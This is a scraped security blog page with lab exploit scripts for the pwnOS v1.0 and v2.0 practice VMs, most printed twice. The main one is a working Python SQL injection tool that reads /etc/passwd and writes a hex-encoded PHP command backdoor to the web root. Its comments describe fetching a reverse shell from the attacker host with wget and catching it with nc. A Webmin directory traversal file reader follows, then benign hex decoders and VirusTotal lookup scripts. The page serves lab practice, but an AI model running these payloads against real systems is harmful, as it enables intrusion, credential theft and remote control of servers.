#!/bin/bash
# Written: December 2012
# Modified: March 2014
# This program is built to decode hex to ASCII text
# The program takes what it is given at the command line and then decodes it...
testInput=$1
# echo $testInput -- If you echo it will read the string from the command line
# cat $testInput -- Takes the filename and decodes it
cat $testInput | sed 's/\\x20/ /g' | \
sed 's/\\x21/!/g' | sed 's/\\x22/"/g' | sed 's/\\x23/#/g' | sed 's/\\x24/$/g' | \
sed 's/\\x25/\\x/g' | sed 's/\\x26/&/g' | sed "s/\\x27/'/g" | sed 's/\\x28/(/g' | \
sed 's/\\x29/)/g' | sed 's/\\x2A/*/g' | sed 's/\\x2B/+/g' | sed 's/\\x2C/,/g' | \
sed 's/\\x2D/-/g' | sed 's/\\x2E/./g' | sed 's/\\x2F/\//g' | sed 's/\\x30/0/g' | \
sed 's/\\x31/1/g' | sed 's/\\x32/2/g' | sed 's/\\x33/3/g' | sed 's/\\x34/4/g' | \
sed 's/\\x35/5/g' | sed 's/\\x36/6/g' | sed 's/\\x37/7/g' | sed 's/\\x38/8/g' | \
sed 's/\\x39/9/g' | sed 's/\\x3A/:/g' | sed 's/\\x3B/;/g' | sed 's/\\x3C/</g' | \
sed 's/\\x3D/=/g' | sed 's/\\x3E/>/g' | sed 's/\\x3F/?/g' | sed 's/\\x40/@/g' | \
sed 's/\\x41/A/g' | sed 's/\\x42/B/g' | sed 's/\\x43/C/g' | sed 's/\\x44/D/g' | \
sed 's/\\x45/E/g' | sed 's/\\x46/F/g' | sed 's/\\x47/G/g' | sed 's/\\x48/H/g' | \
sed 's/\\x49/I/g' | sed 's/\\x4A/J/g' | sed 's/\\x4B/K/g' | sed 's/\\x4C/L/g' | \
sed 's/\\x4D/M/g' | sed 's/\\x4E/N/g' | sed 's/\\x4F/O/g' | sed 's/\\x50/P/g' | \
sed 's/\\x51/Q/g' | sed 's/\\x52/R/g' | sed 's/\\x53/S/g' | sed 's/\\x54/T/g' | \
sed 's/\\x55/U/g' | sed 's/\\x56/V/g' | sed 's/\\x57/W/g' | sed 's/\\x58/X/g' | \
sed 's/\\x59/Y/g' | sed 's/\\x5A/Z/g' | sed 's/\\x5B/[/g' | sed 's/\\x5C/\\/g' | \
sed 's/\\x5D/]/g' | sed 's/\\x5E/^/g' | sed 's/\\x5F/_/g' | sed 's/\\x60/`/g' | \
sed 's/\\x61/a/g' | sed 's/\\x62/b/g' | sed 's/\\x63/c/g' | sed 's/\\x64/d/g' | \
sed 's/\\x65/e/g' | sed 's/\\x66/f/g' | sed 's/\\x67/g/g' | sed 's/\\x68/h/g' | \
sed 's/\\x69/i/g' | sed 's/\\x6A/j/g' | sed 's/\\x6B/k/g' | sed 's/\\x6C/l/g' | \
sed 's/\\x6D/m/g' | sed 's/\\x6E/n/g' | sed 's/\\x6F/o/g' | sed 's/\\x70/p/g' | \
sed 's/\\x71/q/g' | sed 's/\\x72/r/g' | sed 's/\\x73/s/g' | sed 's/\\x74/t/g' | \
sed 's/\\x75/u/g' | sed 's/\\x76/v/g' | sed 's/\\x77/w/g' | sed 's/\\x78/x/g' | \
sed 's/\\x79/y/g' | sed 's/\\x7A/z/g' | sed 's/\\x7B/{/g' | sed 's/\\x7C/|/g' | \
sed 's/\\x7D/}/g' | sed 's/\\x7E/~/g' | sed 's/\\x0A/\n/g'
Twitter: @lokut
This blog is for educational purposes only. The opinions expressed in this blog are my own and do not reflect the views of my employers.
Tuesday, March 11, 2014
Saturday, March 8, 2014
pwnOS v2.0 - Python Script that utilizes SQL Injection on Login
I wrote this python script to demonstrate SQL injection on pwnOS v2.0. When it runs it will automate finding the username that the pwnOS database is running as, the displaying of the /etc/passwd file, and the creating of a simple-backdoor.php in the /var/www directory as sb.php.
The sql injection occurs on the login.php page of pwnOS v2.0 at /var/www/login.php.
#!/usr/bin/python
import socket
import os, sys
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('10.10.10.100', 80))
# Initial HTTP Request to obtain a PHP Session
httpRequest = "GET /index.php HTTP/1.1\n"
httpRequest += "Host: test.com\n\n"
s.send(httpRequest)
data = s.recv(1024)
#Save the httpResponse to a file
f = open('temp.txt','w')
f.write(data)
f.close()
# Pull the PHPSESSID out of the file
with open("temp.txt") as file:
for line in file:
if 'PHPSESSID' in line:
sessionID = line[12:48]
s.recv(1024)
httpRequest = "POST /login.php HTTP/1.1\n"
httpRequest += "Host: 10.10.10.100\n"
httpRequest += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0\n"
httpRequest += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n"
httpRequest += "Accept-Language: en-US,en;q=0.5\n"
httpRequest += "Referer: http://10.10.10.100/login.php\n"
httpRequest += "Cookie: " + sessionID + "\n"
httpRequest += "Connection: keep-alive\n"
httpRequest += "Content-Type: application/x-www-form-urlencoded\n"
# For the query to find the user account that is running the database
# UNION SELECT 1,2,3,user(),5,6,7,8;-- -
# For the query to pull a file like the /etc/passwd
# Use the same process to display the passwords in /var/mysqli_connect.php
# UNION SELECT 1,2,3,load_file(/etc/passwd),5,6,7,8;-- - # This does not work due to /etc/passwd needs to be hex encoded
# echo -n "/etc/passwd" | xxd -ps - # This from the command line will hex encode the file for us
# The following query will work to pull the /etc/passwd file from the file system
# UNION SELECT 1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8;-- -
# For the query to place the simple-backdoor.php in the /var/www/sb.php
# I used echo -n <of the simple-backdoor.php condensed to 1 line> | xxd -ps -
# UNION SELECT 0x3c3f70687020696628697373657428245f524551554553545b27636d64275d29297b206563686f20223c7072653e223b2024636d64203d2028245f524551554553545b27636d64275d293b2073797374656d2824636d64293b206563686f20223c2f7072653e223b206469653b207d203f3e2055736167653a20687474703a2f2f7461726765742e636f6d2f73696d706c652d6261636b646f6f722e7068703f636d643d6361742b2f6574632f706173737764, 2, 3, 4, 5, 6, 7, 8 INTO OUTFILE '/var/www/sb.php'
# After the backdoor file exists you can use it to then copy a php-reverse-shell.php from /usr/share/webshells to /var/www/blog/config
# To do this you can:
(kali) # cd /usr/share/webshells/php/
(kali) # python -m SimpleHTTPServer # Setup a listening webserver on port 8000 to pull the reverse shell from
# URL: http://10.10.10.100/sb.php?cmd=wget http://10.10.10.1:8000/php-reverse-shell.php -O /var/www/blog/config/reverse.php
# The config directory allows the www-data user to write to it
# Then on kali start listening on the port specified in the php-reverse-shell.php with ip of 10.10.10.1
(kali) # nc -lvp
# Then visit on the victim URL: http://10.10.10.100/config/blog/reverse.php
# This will also allow you to see /var/mysqli_config.php from a semi-shell
print "Select Query\n"
print "1. Pull user account that the database is running as\n"
print "2. Pull /etc/passwd File\n"
print "3. Drop php backdoor into /var/www/sb.php\n"
print "4. Custom Query\n"
query = raw_input('Select: ')
if query == '1':
querySelected = "UNION SELECT 1,2,3,user(),5,6,7,8;-- -"
elif query == '2':
querySelected = 'UNION SELECT 1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8;-- -'
elif query == '3':
querySelected = "UNION SELECT 0x3c3f70687020696628697373657428245f524551554553545b27636d64275d29297b206563686f20223c7072653e223b2024636d64203d2028245f524551554553545b27636d64275d293b2073797374656d2824636d64293b206563686f20223c2f7072653e223b206469653b207d203f3e2055736167653a20687474703a2f2f7461726765742e636f6d2f73696d706c652d6261636b646f6f722e7068703f636d643d6361742b2f6574632f706173737764, 2, 3, 4, 5, 6, 7, 8 INTO OUTFILE '/var/www/sb.php';-- -"
elif query == '4':
querySelected = raw_input('Custom Query: ')
postInfo = "email=' " + querySelected + "&pass=thepcnerd&submit=Login&sumbitted=TRUE\n\n"
lengthPostInfo = len(postInfo)
httpRequest += "Content-Length: " + str(lengthPostInfo) + "\n\n"
httpRequest += postInfo
s.send(httpRequest)
if query == '1':
data = s.recv(4096)
#print data
#Save the httpResponse to a file
f = open('temp2.txt','w')
f.write(data)
f.close()
# Pull the <h1> out of the file
with open("temp2.txt") as file:
for line in file:
if '<h1>' in line:
print line
elif query == '2':
data = s.recv(4096)
#print data
#Save the httpResponse to a file
f = open('temp2.txt','w')
f.write(data)
f.close()
data = s.recv(4096)
#print data
#Save the httpResponse to a file
f = open('temp2.txt','a')
f.write(data)
f.close()
with open("temp2.txt") as file:
for line in file:
print line
elif query == '3':
data = s.recv(4096)
print data
elif query == '4':
data = s.recv(4096)
print data
data = s.recv(4096)
print data
The sql injection occurs on the login.php page of pwnOS v2.0 at /var/www/login.php.
#!/usr/bin/python
import socket
import os, sys
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('10.10.10.100', 80))
# Initial HTTP Request to obtain a PHP Session
httpRequest = "GET /index.php HTTP/1.1\n"
httpRequest += "Host: test.com\n\n"
s.send(httpRequest)
data = s.recv(1024)
#Save the httpResponse to a file
f = open('temp.txt','w')
f.write(data)
f.close()
# Pull the PHPSESSID out of the file
with open("temp.txt") as file:
for line in file:
if 'PHPSESSID' in line:
sessionID = line[12:48]
s.recv(1024)
httpRequest = "POST /login.php HTTP/1.1\n"
httpRequest += "Host: 10.10.10.100\n"
httpRequest += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0\n"
httpRequest += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n"
httpRequest += "Accept-Language: en-US,en;q=0.5\n"
httpRequest += "Referer: http://10.10.10.100/login.php\n"
httpRequest += "Cookie: " + sessionID + "\n"
httpRequest += "Connection: keep-alive\n"
httpRequest += "Content-Type: application/x-www-form-urlencoded\n"
# For the query to find the user account that is running the database
# UNION SELECT 1,2,3,user(),5,6,7,8;-- -
# For the query to pull a file like the /etc/passwd
# Use the same process to display the passwords in /var/mysqli_connect.php
# UNION SELECT 1,2,3,load_file(/etc/passwd),5,6,7,8;-- - # This does not work due to /etc/passwd needs to be hex encoded
# echo -n "/etc/passwd" | xxd -ps - # This from the command line will hex encode the file for us
# The following query will work to pull the /etc/passwd file from the file system
# UNION SELECT 1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8;-- -
# For the query to place the simple-backdoor.php in the /var/www/sb.php
# I used echo -n <of the simple-backdoor.php condensed to 1 line> | xxd -ps -
# UNION SELECT 0x3c3f70687020696628697373657428245f524551554553545b27636d64275d29297b206563686f20223c7072653e223b2024636d64203d2028245f524551554553545b27636d64275d293b2073797374656d2824636d64293b206563686f20223c2f7072653e223b206469653b207d203f3e2055736167653a20687474703a2f2f7461726765742e636f6d2f73696d706c652d6261636b646f6f722e7068703f636d643d6361742b2f6574632f706173737764, 2, 3, 4, 5, 6, 7, 8 INTO OUTFILE '/var/www/sb.php'
# After the backdoor file exists you can use it to then copy a php-reverse-shell.php from /usr/share/webshells to /var/www/blog/config
# To do this you can:
(kali) # cd /usr/share/webshells/php/
(kali) # python -m SimpleHTTPServer # Setup a listening webserver on port 8000 to pull the reverse shell from
# URL: http://10.10.10.100/sb.php?cmd=wget http://10.10.10.1:8000/php-reverse-shell.php -O /var/www/blog/config/reverse.php
# The config directory allows the www-data user to write to it
# Then on kali start listening on the port specified in the php-reverse-shell.php with ip of 10.10.10.1
(kali) # nc -lvp
# Then visit on the victim URL: http://10.10.10.100/config/blog/reverse.php
# This will also allow you to see /var/mysqli_config.php from a semi-shell
print "Select Query\n"
print "1. Pull user account that the database is running as\n"
print "2. Pull /etc/passwd File\n"
print "3. Drop php backdoor into /var/www/sb.php\n"
print "4. Custom Query\n"
query = raw_input('Select: ')
if query == '1':
querySelected = "UNION SELECT 1,2,3,user(),5,6,7,8;-- -"
elif query == '2':
querySelected = 'UNION SELECT 1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8;-- -'
elif query == '3':
querySelected = "UNION SELECT 0x3c3f70687020696628697373657428245f524551554553545b27636d64275d29297b206563686f20223c7072653e223b2024636d64203d2028245f524551554553545b27636d64275d293b2073797374656d2824636d64293b206563686f20223c2f7072653e223b206469653b207d203f3e2055736167653a20687474703a2f2f7461726765742e636f6d2f73696d706c652d6261636b646f6f722e7068703f636d643d6361742b2f6574632f706173737764, 2, 3, 4, 5, 6, 7, 8 INTO OUTFILE '/var/www/sb.php';-- -"
elif query == '4':
querySelected = raw_input('Custom Query: ')
postInfo = "email=' " + querySelected + "&pass=thepcnerd&submit=Login&sumbitted=TRUE\n\n"
lengthPostInfo = len(postInfo)
httpRequest += "Content-Length: " + str(lengthPostInfo) + "\n\n"
httpRequest += postInfo
s.send(httpRequest)
if query == '1':
data = s.recv(4096)
#print data
#Save the httpResponse to a file
f = open('temp2.txt','w')
f.write(data)
f.close()
# Pull the <h1> out of the file
with open("temp2.txt") as file:
for line in file:
if '<h1>' in line:
print line
elif query == '2':
data = s.recv(4096)
#print data
#Save the httpResponse to a file
f = open('temp2.txt','w')
f.write(data)
f.close()
data = s.recv(4096)
#print data
#Save the httpResponse to a file
f = open('temp2.txt','a')
f.write(data)
f.close()
with open("temp2.txt") as file:
for line in file:
print line
elif query == '3':
data = s.recv(4096)
print data
elif query == '4':
data = s.recv(4096)
print data
data = s.recv(4096)
print data
pwnOS v1.0 Python Script for Reading files through Directory Traversal
I was working with the pwnOS v1.0 to be able to gain root. One of the steps was to use a directory traversal flaw in miniserv to read files on the filesystem. I liked the metasploit module but I found that I wanted a quicker script and something I could save the output with. I then designed the following script using python:
#!/usr/bin/python
# This script was build off of the concept of the metasploit auxiliary plugin for displaying files on Webmin due to a directory traversal vulnerability. This allows you to put in place the file that you would like to pull and retrieve it quicker than if you are in maetasploit. You can also redirect the output to a file.
import socket
import os, sys
import urllib
if len(sys.argv) > 1:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.11.151',10000))
# Found that the %01 can be substituted for other characters.
url = "/unauthenticated/" + "/..%01"*40 + sys.argv[1]
httpRequest = "GET " + url + " HTTP/1.1\n"
httpRequest += "Host: test.com\n\n"
s.send(httpRequest)
for i in range(1,15):
data = s.recv(1024)
print data
else:
print "Usage: ./displayFile.py file"
print "The file in this case is any file on the file system you can pull.\n\n"
#!/usr/bin/python
# This script was build off of the concept of the metasploit auxiliary plugin for displaying files on Webmin due to a directory traversal vulnerability. This allows you to put in place the file that you would like to pull and retrieve it quicker than if you are in maetasploit. You can also redirect the output to a file.
import socket
import os, sys
import urllib
if len(sys.argv) > 1:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.11.151',10000))
# Found that the %01 can be substituted for other characters.
url = "/unauthenticated/" + "/..%01"*40 + sys.argv[1]
httpRequest = "GET " + url + " HTTP/1.1\n"
httpRequest += "Host: test.com\n\n"
s.send(httpRequest)
for i in range(1,15):
data = s.recv(1024)
print data
else:
print "Usage: ./displayFile.py file"
print "The file in this case is any file on the file system you can pull.\n\n"
Wednesday, March 5, 2014
Decode Hex to ASCII Bash Script
cat $1 | sed 's/%20/ /g' | sed 's/%22/"/g' | sed 's/%28/(/g' | sed 's/%29/)/g' | sed 's/%3E/>/g' | \
sed 's/%3D/=/g' | sed 's/%3B/;/g' | sed 's/%7C/|/g' | sed 's/%2C/,/g' | \
sed 's/%7B/{/g' | sed 's/%7D/}/g' | sed 's/%3C/</g' | sed 's/%3F/?/g' | sed 's@%2F@/@g' | \
sed 's/%0A/\n/g' | sed "s/%27/'/g" | sed 's/%26/\&/g' | sed 's/%3A/:/g' | \
sed 's/%5C/\\/g' | sed 's/%2B/+/g' | sed 's/%21/!/g'
sed 's/%3D/=/g' | sed 's/%3B/;/g' | sed 's/%7C/|/g' | sed 's/%2C/,/g' | \
sed 's/%7B/{/g' | sed 's/%7D/}/g' | sed 's/%3C/</g' | sed 's/%3F/?/g' | sed 's@%2F@/@g' | \
sed 's/%0A/\n/g' | sed "s/%27/'/g" | sed 's/%26/\&/g' | sed 's/%3A/:/g' | \
sed 's/%5C/\\/g' | sed 's/%2B/+/g' | sed 's/%21/!/g'
VirusTotal API Submission - Domain Report
This is helpful:
#!/usr/bin/python
import json
import urllib
import urllib2
import sys
import pprint
url = "https://www.virustotal.com/vtapi/v2/domain/report"
if (len(sys.argv) > 1):
submitDomain = sys.argv[1]
parameters = {"domain": submitDomain, "apikey": "---API Key---"}
response = urllib.urlopen('%s?%s' % (url, urllib.urlencode(parameters))).read()
response_dict = json.loads(response)
#print response_dict
print json.dumps(response_dict, indent=4)
else:
print "Usage: ./domainReport.py <domain>"
#!/usr/bin/python
import json
import urllib
import urllib2
import sys
import pprint
url = "https://www.virustotal.com/vtapi/v2/domain/report"
if (len(sys.argv) > 1):
submitDomain = sys.argv[1]
parameters = {"domain": submitDomain, "apikey": "---API Key---"}
response = urllib.urlopen('%s?%s' % (url, urllib.urlencode(parameters))).read()
response_dict = json.loads(response)
#print response_dict
print json.dumps(response_dict, indent=4)
else:
print "Usage: ./domainReport.py <domain>"
VirusTotal API Submission - Submit URL
Found this to be helpful:
#!/usr/bin/python
import json
import simplejson
import urllib
import urllib2
import sys
url = "https://www.virustotal.com/vtapi/v2/url/scan"
if (len(sys.argv) > 1):
submitURL = sys.argv[1]
parameters = {"url": submitURL, "apikey": "---API Key---"}
data = urllib.urlencode(parameters)
req = urllib2.Request(url,data)
response = urllib2.urlopen(req)
output = json.loads(response.read())
print json.dumps(output, indent=4)
else:
print "Usage: ./submitURL <url>"
#!/usr/bin/python
import json
import simplejson
import urllib
import urllib2
import sys
url = "https://www.virustotal.com/vtapi/v2/url/scan"
if (len(sys.argv) > 1):
submitURL = sys.argv[1]
parameters = {"url": submitURL, "apikey": "---API Key---"}
data = urllib.urlencode(parameters)
req = urllib2.Request(url,data)
response = urllib2.urlopen(req)
output = json.loads(response.read())
print json.dumps(output, indent=4)
else:
print "Usage: ./submitURL <url>"
VirusTotal API Submission - IP Address Report
Found this to be helpful in gathering reports about IP Addresses:
#!/usr/bin/python
import json
import urllib
import urllib2
import sys
import pprint
url = "https://www.virustotal.com/vtapi/v2/ip-address/report"
if (len(sys.argv) > 1):
submitIP = sys.argv[1]
parameters = {"ip": submitIP, "apikey": "---API Key---"}
response = urllib.urlopen('%s?%s' % (url, urllib.urlencode(parameters))).read()
response_dict = json.loads(response)
#print response_dict
print json.dumps(response_dict, indent=4)
else:
print "Usage: ./ipAddressReport <ip>"
#!/usr/bin/python
import json
import urllib
import urllib2
import sys
import pprint
url = "https://www.virustotal.com/vtapi/v2/ip-address/report"
if (len(sys.argv) > 1):
submitIP = sys.argv[1]
parameters = {"ip": submitIP, "apikey": "---API Key---"}
response = urllib.urlopen('%s?%s' % (url, urllib.urlencode(parameters))).read()
response_dict = json.loads(response)
#print response_dict
print json.dumps(response_dict, indent=4)
else:
print "Usage: ./ipAddressReport <ip>"
Subscribe to:
Posts (Atom)
Test Authentication from Linux Console using python3 pexpect
Working with the IT420 lab, you will discover that we need to discover a vulnerable user account. The following python3 script uses the pex...
-
Here is a quick walk through of GetBoo. The first item that I found was you can harvest the usernames of the existing users that are regist...
-
As I was glancing through the logs of my honeypots I spent some time to look at the following logs. In the past I have just overlooked them...
-
I thought I would work through a few of these web applications provided by OWASP on their broken web applications VM. The first one I th...
-
Today looking at the logs of the honeypots, I became curious based on the whois of the IP Addresses attempting to login to SSH which country...
-
Recently I was doing some scanning with a tool that is available on github called masscan. The tool allows you to configure a configuration...